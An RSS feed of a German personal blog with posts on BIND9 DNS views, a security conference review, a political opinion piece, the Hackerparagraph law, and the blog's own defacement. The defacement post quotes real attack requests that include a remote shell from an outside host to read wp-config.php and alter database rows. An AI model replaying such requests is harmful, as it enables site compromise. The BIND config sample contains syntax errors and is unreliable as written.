<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>AnB-Networkz &#187; Sicherheit</title>
	<atom:link href="http://anb-networkz.de/tag/sicherheit/feed/" rel="self" type="application/rss+xml" />
	<link>http://anb-networkz.de</link>
	<description>Sinnlosigkeit hat auch ein Ende</description>
	<lastBuildDate>Sun, 05 Sep 2010 22:20:26 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Bind9 DNS Server: Views</title>
		<link>http://anb-networkz.de/2010/03/bind9-dns-server-views/</link>
		<comments>http://anb-networkz.de/2010/03/bind9-dns-server-views/#comments</comments>
		<pubDate>Wed, 24 Mar 2010 20:05:35 +0000</pubDate>
		<dc:creator>Andre</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[HowTo]]></category>
		<category><![CDATA[acl]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[linux; bind9]]></category>
		<category><![CDATA[nameserver]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=441</guid>
		<description><![CDATA[<!-- Easy AdSense V2.92 -->
<!-- Post[count: 3] -->
<div class="ezAdsense adsense adsense-leadin" style="text-align:center;margin:12px;"> <!-- Begin BidVertiser code -->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=330680&bid=817191" type="text/javascript"></SCRIPT>
<noscript><a href="http://www.bidvertiser.com">pay per click advertising</a></noscript>
<!-- End BidVertiser code --> </div>
<!-- Easy AdSense V2.92 -->



 

pay per click advertising
 


Views sind eine ganz praktische Sache, um bestimmte DNS-Zonen nur für einzelne Quell-Netze zur Verfügung zu stellen. So ist es möglich, auf ein und dem selben DNS-Server unkompliziert öffentliche und intern DNS-Zonen zu betreiben. Auch ist es ganz nützlich, um Kunden (die ja üblicherweise in einem Gast-Netz isoliert sind), Internetzugriff [...]]]></description>
			<content:encoded><![CDATA[<p>Views sind eine ganz praktische Sache, um bestimmte DNS-Zonen nur für einzelne Quell-Netze zur Verfügung zu stellen. So ist es möglich, auf ein und dem selben DNS-Server unkompliziert öffentliche und intern DNS-Zonen zu betreiben. Auch ist es ganz nützlich, um Kunden (die ja üblicherweise in einem Gast-Netz isoliert sind), Internetzugriff über einen Nameserver zu ermöglichen ohne die eigenen internen DNS-Zonen zu preiszugeben oder einen zweiten DNS-Server zu installieren.</p>
<p>Das ganze ist schnell eingerichtet. Zuerst benötigt man eine ACL in der die Clients definiert werden, für die dieser view verwendet werden soll. In meinem Beispiel sollen alle Clients aus dem Bereich 192.168.0.0/24 nur Einträge aus der Zone pub.anb-networkz.net auflösen können. Alle Clients aus 10.0.0.0/8 sollen priv.anb-networkz.net und pub.anb-networkz.net auflösen können. Die RR&#8217;s liegen in den Zonefiles pub.anb-networkz.zone und priv.anb-networkz.zone. Zusätzlich dürfen die Clients aus dem view &#8220;priv&#8221; keine Rekursiven Anfragen stellen. Nun erst einmal die relevanten Konfigurationsparameter:</p>
<p><code><br />
# ACL fuer externe Benutzer (Gaeste)<br />
acl "pub" { 192.168.0.0/24; };<br />
# ACL fuer interne Benutzer, duerfen keine Internetadressen aufloesen<br />
acl "priv" { 10.0.0.0/8; };<br />
# Definition des Views fuer interne Benutzer<br />
view "priv" {<br />
         match-clients { priv; };         # Trifft bei Anfragen von Intern<br />
         allow-query { priv; };           # Anfragen nur von Intern erlauben<br />
         allow-recursion { none; };    # Rekursion verbieten<br />
         # START Zonendefinition fuer interne Zone<br />
         zone "priv.anb-networkz.net" {<br />
                   type master;<br />
                   file "priv.anb-networkz.zone";<br />
         }<br />
        # ENDE Zonendefinition fuer interne Zone<br />
};<br />
# ENDE definition View fuer interne Benutzer<br />
# START definition View fuer Gaeste<br />
view "pub" {<br />
         match-clients { pub; };        # Triffe auf Clients der ACL pub<br />
         allow-query { pub; ];           # erlaube Anfragen von Clients der ACL pub<br />
         allow-query-cache {pub; };  # erlaubt Cache-Anfragen von Clients der ACL pub<br />
         allow-recursion { pub; };      # Erlaubt Rekursive Anfragen von Clients der ACL pub<br />
         # DNS-Zone fuer Gaeste<br />
         zone "pub.anb-networkz.net" {<br />
                  type master;<br />
                  file "pub.anb-networkz.zone;<br />
         }<br />
        # ENDE DNS-Zone fuer Gaeste<br />
};<br />
# ENDE definition View fuer Gaeste<br />
</code><br />
Mit View bieten sicn nahezu unbegrenzte Möglichkeiten DNS-Server für mehrere Kunden oder Netze zu konfigurieren. Es ist problemlos möglich, Zonen mehrerer Kunden nur für die Netze dieser Kunden zugänglich zu machen aber dennoch nur einen Server zu verwenden. Vie Spaß beim ausprobieren. </p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2010/03/bind9-dns-server-views/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TecChannel Security Konferenz 2008 &#8211; mein Fazit</title>
		<link>http://anb-networkz.de/2008/11/tecchannel-security-konferenz-2008-mein-fazit/</link>
		<comments>http://anb-networkz.de/2008/11/tecchannel-security-konferenz-2008-mein-fazit/#comments</comments>
		<pubDate>Sat, 08 Nov 2008 01:10:21 +0000</pubDate>
		<dc:creator>Andre</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[it]]></category>
		<category><![CDATA[konferenz]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[tecchannel]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=132</guid>
		<description><![CDATA[Was würde man denken wenn man folgende Beschreibung in einer Einladung liest?
Security-Strategien, Compliance, Rechtsfolgen von Datenlecks, IT-Sicherheit: Planung ist die halbe Miete, Sichere Einbindung mobiler Mitarbeiter, Schutz vor Internetkriminellen.
Ich dachte, es handelt ich um eine Konferenz die etwas mehr transparenz in diese Themen bringt und auf die grnundlegenden technologien zur absicherung dieser Dienste eingeht, Naja, [...]]]></description>
			<content:encoded><![CDATA[<p>Was würde man denken wenn man folgende Beschreibung in einer Einladung liest?</p>
<p>Security-Strategien, Compliance, Rechtsfolgen von Datenlecks, IT-Sicherheit: Planung ist die halbe Miete, Sichere Einbindung mobiler Mitarbeiter, Schutz vor Internetkriminellen.</p>
<p>Ich dachte, es handelt ich um eine Konferenz die etwas mehr transparenz in diese Themen bringt und auf die grnundlegenden technologien zur absicherung dieser Dienste eingeht, Naja, zumindest entsprachen einige Vorträge auch tatsächlich diesen Erwartungen. Andere jedoch leider nicht. Hier noch einmal die Agenda und mein Fazit.</p>
<hr /><strong><a href="http://tc.idgevents.de/konferenzen/212/tecchannel_security_konferenz_p3.html">TecChannel Security Konferenz 2008</a></strong></p>
<p><strong>10:15 Uhr Was wäre wenn?</strong><br />
Sehr guter Beitrag über aktuelle Gefahren und Risiken. Leider konnte ich diesen Beitrag nich vollständig anhören.<br />
<strong>11:40 Clientlose Anbindung externer/mobiler Mitarbeiter – Chance oder Risiko?</strong><br />
Fast ausschließlich Produktwerbung für ein SSL-VPN Gateway und kaum technische Informationen zu verwendeten Protokollen. Leider wurde das Thema etwas heruntergespielt, so wurde die Software als &#8220;sicher für remotezugriff aus Internetcafe´s&#8221; beworben. Im grunde kann dieses Produkt auch nicht mehr als alle anderen auf dem Markt befindlichen Produkte dieser Kategorie. Die Sicherheitsrelevanz dieses Beitrages war sehr gering und diente ehr der Verblendung des Managements.<br />
<strong>12:15 Uhr Sicherheitsmanagement und –planung</strong><br />
Vorstellung der allgemein bekannten modelle wie Cobit, ISO27001 oder ITIL. Da ich mich selbst mit diesem Thema beschäftige, ergab sich für mich keinerlei Vorteil. Wer allerdings noch nie etwas mit diesen Prozessen zu tun hatte, fände diesen Vortrag sicher sehr Interessant.<br />
<strong>14:15 Uhr Total cost of ownership &#8211; Was kostet Antiviren-Software wirklich?</strong><br />
Schon einmal die TCO´s für mehrere Virenscanner berechnet und auf basis dieser ein Produkt ausgewählt? Es kommt immer auf viel mehr Faktoren als reine Kosten an. Systemadministratoren mit gewisser Erfahrung werden den Support fast nie beanspruchen. Auch die anzahl der Vorfälle ist nicht so relevant wie im Beitrag erwähnt. Dinge, wie zb. die zentrale konfigurierbarkeit, platformunabhängigkeit oder Zeitaufwand für die Installation wurden in der Demo-TCO Berechnung einfach nicht erwähnt. Dafür aber Eigenwerbung für die Trefferquote des Scanners unter Idealbedingungen, Supportkosten und Hardwareanforderungen (also Kosten die bei evt. erforderlichen Hardwaretausch anfallen). Meines erachtens nach unvollständig und auf einen bestimmten Hersteller zugeschnitten.<br />
<strong>14:50  Uhr E-Mail-Schutz auf mehreren Ebenen</strong><br />
Eigenwerbung für einen Messagefilter mit 100% Trefferquote. 100% Okey, laut diesem Beitrag schon. Das dies in der Realität sehr schnell ganz anders ist, wird sicher jeder wissen. Das vorgestellte Produkt ist ohne zweifel gut, aber bei benauerer Betrachtung kann man diese Funktionen zu 85% mit freier Software nachbauen. Weitere 10% bekommt man mit günstigen Zusatzprodukten. Die verbleibenden Features sind eigentlich in einem richtig konfiguriertem und gut funktionierendem Mailsystem unwichtig. Dieser Beitrag bestand mehr aus Werbung als Informationen. Schade, der Titel versprach großes. Und wie Spammer an Informationen kommen, sollte eigentlich jedem bekannt sein.<br />
<strong>16:00  Uhr Think, before you post &#8211; Web 2.0 und die (Rechts-)Folgen</strong><br />
WOW Das ist alles was ich zu diesem Beitrag sagen kann. Sehr gute Präsentation der aktuellen Probleme mit Sozialen Netzen, Blogs, Foren und anderen &#8220;Web2.0&#8243; Platformen. Sehr gut dargestellt. es war zwar etwas eigenwerbung versteckt, das fand ich aber nicht weiter schlimm. Er ging auf Themen wie Profilierung von Nutzern/Arbeitnehmern, Image-Schädigung von Firmen oder Daten-/informationshandel ein. Sehr guter Beitrag wie ich fand. Trotzdem blogge ich weiter <img src='http://anb-networkz.de/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<hr />Ja, das war die Konerenz. Wie bei allen Veranstaltungen einige Gute aber auch einige schlechte Beiträge. In der Summe würde ich dieser Veranstaltung als mittelmäßig einschätzen. Was den Preis angeht, bekommt man auf jedem Linux-TAG mehr und bessere Vorträge zu ähnlichen Themen für wesentlich weniger Geld.</p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2008/11/tecchannel-security-konferenz-2008-mein-fazit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>anb-networkz defaced</title>
		<link>http://anb-networkz.de/2008/06/anb-networkz-defaced/</link>
		<comments>http://anb-networkz.de/2008/06/anb-networkz-defaced/#comments</comments>
		<pubDate>Sun, 01 Jun 2008 13:53:03 +0000</pubDate>
		<dc:creator>Andre</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[Bugs]]></category>
		<category><![CDATA[defaced]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[sql-injection]]></category>
		<category><![CDATA[webserver]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=59</guid>
		<description><![CDATA[Am 30.05.2008 hat es mein kleines Blog erwischt. Eine Person der XTech Group hat doch tatsächlich per SQL-Injection einige Einträge in der Wordpress-Datenbank geändert. Zum Glück habe ich ja Backup&#8217;s. Das habe ich gleich als Anlass für ein Upgrade auf die aktuelle WPD Version genutzt. Nunja, eigentlich konnte wordpress nichts für den deface. Die Pseudo-hacker [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://anb-networkz.net/wp-content/uploads/2008/06/defaced.png"><img class="alignleft size-thumbnail wp-image-60" title="defaced" src="http://anb-networkz.de/wp-content/uploads/2008/06/defaced-150x150.png" alt="Screenshot vom Ergebniss der SQL-Injection" width="150" height="150" /></a>Am 30.05.2008 hat es mein kleines Blog erwischt. Eine Person der XTech Group hat doch tatsächlich per SQL-Injection einige Einträge in der Wordpress-Datenbank geändert. Zum Glück habe ich ja Backup&#8217;s. Das habe ich gleich als Anlass für ein Upgrade auf die aktuelle WPD Version genutzt. Nunja, eigentlich konnte wordpress nichts für den deface. Die Pseudo-hacker nutzten ein Script eines früheren CMS, um die wpp-config.php auszulesen. Anschließend wurden mit einigen SQL-Query&#8217;s diverse Datensätze in der MySQL Datenbank geändert. Unter anderem auch der Blog-title und die Blod-Description. Was soll&#8217;s.  auch ganz lustig anzuschauen waren die Request-Header in den Logfiles des Webservers. Dort ließ sich der deface quasi Nachstellen. Hier einige Einträge:<br />
<code><br />
GET http://anb-networkz.net/html/modules/contact/main.php?this_module_path<br />
=http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&amp;act=f&amp;<br />
f=wp-config.php&amp;d=%2Fwww%2Fhtdocs%2Fv100329&amp;"<br />
POST /html/modules/contact/main.php?this_module_path=<br />
http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&amp;<br />
act=sql&amp;sql_login=*******&amp;sql_passwd=**********&amp;<br />
sql_server=localhost&amp;sql_port=3306&amp;sql_db=***&amp;<br />
sql_tbl_act=insert&amp;sql_tbl=wp_options&amp;sql_tbl_ls=0&amp;<br />
sql_tbl_le=30&amp;sql_tbl_insert_q=+%60option_id%60+%3D+<br />
%272%27+AND+%60blog_id%60+%3D+%270%27+AND+%60option_name%<br />
60+%3D+%27blogname%27+AND+%60option_value%60+%3D+<br />
%27..%3A%3AANB-Networkz%3A%3A..%27+AND+%60autoload%60+<br />
%3D+%27yes%27+<br />
</code><br />
Der Aufrufe wurden von 203.162.2.133 ausgelöst, und nutzten Scripte einer (warscheinlich gehackten) website. Da sich dort ein Forum befindet, werde ich das gleich mal dort Posten.</p>
<p>Ich habe nun nur noch Wordpress auf diesem Webspace, alle Kennwörter wurden geändert und eine obligatorische Anzeige gegen unbekannt eingereicht. Mal sehen was passiert <img src='http://anb-networkz.de/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2008/06/anb-networkz-defaced/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Von Diktaturen, unterdrückten andersdenkenden und sinnlosen Gesetzen</title>
		<link>http://anb-networkz.de/2008/03/von-diktaturen-unterdruckten-andersdenkenden-und-sinnlosen-gesetzen/</link>
		<comments>http://anb-networkz.de/2008/03/von-diktaturen-unterdruckten-andersdenkenden-und-sinnlosen-gesetzen/#comments</comments>
		<pubDate>Tue, 18 Mar 2008 23:30:16 +0000</pubDate>
		<dc:creator>Andre</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[einschränkung]]></category>
		<category><![CDATA[gesetze]]></category>
		<category><![CDATA[kontrolle]]></category>
		<category><![CDATA[politik]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[tibet]]></category>
		<category><![CDATA[überwachung]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/2008/03/19/von-diktaturen-unterdruckten-andersdenkenden-und-sinnlosen-gesetzen</guid>
		<description><![CDATA[Was sagt die Welt zu kranken Menschen, die ohne jeden für andere Menschen erkennbaren Grund mit Waffen eine Schule stürmen und mehrere Menschen verletzten? Es werden mehr Überwachung, sinnlose Protokollierung aller Verbindungs und Nutzungsdaten, blind geschriebene Verbote gegen Werkzeuge, die die eigenen Experten als Verbrecher abstempelt und andere Dinge beschlossen. Sinnlose Aussagen von Pseudo-Experten stufen [...]]]></description>
			<content:encoded><![CDATA[<p>Was sagt die Welt zu kranken Menschen, die ohne jeden für andere Menschen erkennbaren Grund mit Waffen eine Schule stürmen und mehrere Menschen verletzten? Es werden mehr Überwachung, sinnlose Protokollierung aller Verbindungs und Nutzungsdaten, blind geschriebene Verbote gegen Werkzeuge, die die eigenen Experten als Verbrecher abstempelt und andere Dinge beschlossen. Sinnlose Aussagen von Pseudo-Experten stufen alles auch nur irgendwie mit Gewalt in Verbindung stehende als &#8220;Schlecht für die Allgemeinheit&#8221; oder &#8220;Terrorermutigend&#8221; ein ohne reale Studien auch nur ansatzweise zu beachten. Freie Informationsplatformen, Communitys und Kommunikationsmittel werden systematisch abgeschafft oder durch kommerzielle, gut kontrollierbare Systeme ersetzt. Sperrung und Zensur werden diskutiert, Spionage und Überwachungsmethoden ohne Rücksicht auf Grundrechte oder Branchenaussagen einfach beschlossen (auch wenn sie später durch Gerichte wieder ausgehoben oder eingeschränkt werden).</p>
<p>Das passiert also in Deutschland wenn mal wieder irgendetwas passiert. Nagut, die monatelange Gehirnwäsche der Medien sollte auch erwähnt werden, oder wie soll man sonst Dauerberichte von diesen Themen interpretieren? Informationen werden nur jeweils von einer Seite berichtet, eine quasi reine schwarz-weiß Darstellung und Flachrechnung der Weltansicht auf die jeweils für die Regierung passenden Ansichten.</p>
<p>Bildung, Informationsbereitstellung, Freiheit und Grundrechte werden immer mehr in den Hintergrund geschoben. Die Menschheit wird immer gefügiger und denkt quasi blind an alles mögliche. Globale, unabhängige Netzwerke wie das Internet müssen natürlich dermaßen eingeschränkt und kontrolliert werden das sich niemand mehr daran erinnert wofür Netze wie das DFN oder das Internet eigentlich erfunden wurden &#8230; abgesehen von den Militärischen Zielen.</p>
<p>Was bringt die Menschheit dazu, verbrechen in Ländern wie China zuzulassen? Würde ein anderes, kleineres Land ein anderes überfallen würden sich sofort Politiker aller anderen Länder einmischen. Was ist aber mit Tibet? Warum werden hier keine Sanktionen gegen China ausgesprochen? Wer baut nochmal unsere Elektronik? Ohne Worte&#8230;.Passiert im einenem Land irgendetwas, wird das für die tollsten Gesätzesänderungen genutzt. Betreibt ein anderes Land jahrzehntelange Unterdrückung und Ressourcenausbeutung, passiert aufgrund der wirtschaftlichen Partnerschaften mit den Unterdrückerland nichts. Vielleicht vergisst man es ja.</p>
<p>Ich musste das einfach mal loswerden <img src='http://anb-networkz.de/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p>Schaut euch doch einmal dieses Land an, hier ein paar Links:</p>
<p>http://www.tibet-initiative.de</p>
<p>http://de.wikipedia.org/wiki/Tibet</p>
<p>http://www.google.de/search?hl=de&amp;q=tibet&amp;btnG=Suche</p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2008/03/von-diktaturen-unterdruckten-andersdenkenden-und-sinnlosen-gesetzen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Neues zum Thema Hackertools</title>
		<link>http://anb-networkz.de/2008/03/neues-zum-thema-hackertools/</link>
		<comments>http://anb-networkz.de/2008/03/neues-zum-thema-hackertools/#comments</comments>
		<pubDate>Sun, 02 Mar 2008 02:04:27 +0000</pubDate>
		<dc:creator>Andre</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[chemnitz]]></category>
		<category><![CDATA[hackertools]]></category>
		<category><![CDATA[linuxtage]]></category>
		<category><![CDATA[recht]]></category>
		<category><![CDATA[Sicherheit]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/2008/03/02/neues-zum-thema-hackertools</guid>
		<description><![CDATA[Nachdem ich mir den Vortrag eines Rechtsanwaltes zum Thema Hackerparagraph auf den Chemnitzer LinuxTagen angehÃ¶rt habe, ist die Lage fÃ¼r mich nun etwas klarer. Die ganze Situation ist im Moment etwas schwammig. Es ist zwischen Tools fÃ¼r die reine Sicherheitsanalyse, also den &#8220;guten Programmen&#8221;, den fÃ¼r beide Seiten einsetzbaren, sogenannten &#8220;Dual-Use&#8221; Programmen und den &#8220;bÃ¶sen&#8221;, [...]]]></description>
			<content:encoded><![CDATA[<p>Nachdem ich mir den Vortrag eines Rechtsanwaltes zum Thema Hackerparagraph auf den Chemnitzer LinuxTagen angehÃ¶rt habe, ist die Lage fÃ¼r mich nun etwas klarer. Die ganze Situation ist im Moment etwas schwammig. Es ist zwischen Tools fÃ¼r die reine Sicherheitsanalyse, also den &#8220;guten Programmen&#8221;, den fÃ¼r beide Seiten einsetzbaren, sogenannten &#8220;Dual-Use&#8221; Programmen und den &#8220;bÃ¶sen&#8221;, rein schÃ¤dlichen Programmen zu unterscheiden. Ein Tool, das einzig mit dem Zweck geschrieben wurde Schaden anzurichten, wie zb. WÃ¼rmer, Viren, Hacking-Scripts oder Backdoor-BausÃ¤tze sind grundsÃ¤tzlich (wie frÃ¼her auch schon) verboten. Diese Tools, die sogenannten DualUse Programme die zb. zum prÃ¼fen von KennwÃ¶rtern, Scannen von SicherheitslÃ¼cken und &#8220;wiederherstellen von Passwortern&#8221; erstellt wurden, dÃ¼rfen, wenn die Absicht eindeutig <strong>NICHT </strong>bÃ¶swillig ist, weiterhin verwendet werden. Allerdings sollte man die Verwendung dieser Tools auf jeden Fall Schriftlich festhalten und vom Arbeitgeber bestÃ¤tigen lassen das diese fÃ¼r die PrÃ¼fung der Netzwerksicherheit unbedingt erforderlich sind. Verlinken, bereitstellen oder beschreiben sollte man diese Programme allerdings aufgrund der unklaren Rechtslage nicht. Auch Hinweise oder gut gemeinte Tips die auch nur irgendwie zum ausspÃ¤hen von Daten oder anderen irgendwie erdenklichen Angriffen verwendet werden kÃ¶nnten sollte man vorerst unterlassen. Andere Tools, die eindeutig &#8220;gut&#8221; sind, darf man weiterhin wie gewohnt einsetzen. Auch aufpassen sollte man beim Einsatz von Netzwerksniffern, Portscannern oder Logging-Tools, da diese Informationen dieser Programme bei einem Angriff nÃ¼tzlich sein kÃ¶nnten. Auch hier gilt, unbedingt vom Arbeitgeber bestÃ¤tigen lassen. Absolut unklar ist aber weiterhin was passiert, wenn man selbst durch Fehleingaben in lÃ¶chrigen Anwendungen wie zb. Websites zufÃ¤llig Schaden anrichtet (zb. eine versehentliche SQL-Injection). Das kann schon passieren wenn man unbedacht Steuerzeichen oder Escape-Zeichen in BeitrÃ¤gen verwendet und diese von der Webanwendung falsch interpretiert werden was zu einer versehentlichen Manipulation von Daten fÃ¼hren kÃ¶nnte. Ebenfalls absolut unklar ist der Umgang mit abgefangenen Trojanern oder Viren aus EMails oder Web-Content im Isolationsordner des Mail/Proxyservers. Sollte man diese Programme weiter verwenden um seine eigenen Systeme in abgesicherten Umgebungen weiter zu Testen kann das schon ausreichen um den tatbestand zu erfÃ¼llen. Also am besten nichts mehr aufheben und sofort lÃ¶schen, was allerdings gegen die gesetze der EMail-Archivierung verstoÃŸen wÃ¼rde (Emails mÃ¼ssen vollstÃ¤ndig Archiviert werden. Eine trennung von Spam wird dort nicht ausgegrenzt, es ist definitiv die Rede von jeglicher EMail-Kommunikation&#8221;. Wie man sieht grenzt sich nicht nur das neue Gesetz selbst in mehreren Bereichen aus, sondern kollidiert auch massiv mit anderen gesetzen. Solange das nicht alles geklÃ¤rt wurde, sollte man besser Ã¼berhaupt keine Tools dieser Art mehr verwenden und die Spam/Virenmails ungeprÃ¼ft wegarchivieren. Was auch zu einem Problem werden kÃ¶nnte, sind sogenannte &#8220;Live_Hacking&#8221; Veranstaltungen. Diese sollte man allein wegen dem Wort Hacking lieber IT SicherheitsvorfÃ¼hrung oder Ã¤hnlich benennen. Tools, die Live KennwÃ¶rter cracken oder Userdaten ausspÃ¤hen sollte man bei diesen VorfÃ¼hrungen grundsÃ¤tzlich nicht verwenden.</p>
<p>Meine Meinung zu dem Thema ist, das die komplette IT-Industrie im Moment extrem gelÃ¤mt und von unsicherheiten durchzogen ist. Niemand kann sich absolut sicher sein ob das Tool das er zur Analyse der Sicherheitsrisiken im Netzwerk verwendet, Ã¼berhaupt legal ist. Arbeitsmethoden, Tools, Konzepte, dies alles sollte grundsÃ¤tzlich geprÃ¼fe und bei Bedarf angepasst werden um keine &#8220;eventuell Illegalen&#8221; TÃ¤tigkeiten auszufÃ¼hren. Die verbleibenden Tools sollte man Schriftlich festhalten, die Personen die diese verwenden dÃ¼rfen benennen und die DatentrÃ¤ger/Speicherorte dieser Programme zusÃ¤tzlich Sichern um keine versehentliche Verbreitung auszulÃ¶sen. Mal sehen wie lange das noch gut geht.</p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2008/03/neues-zum-thema-hackertools/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
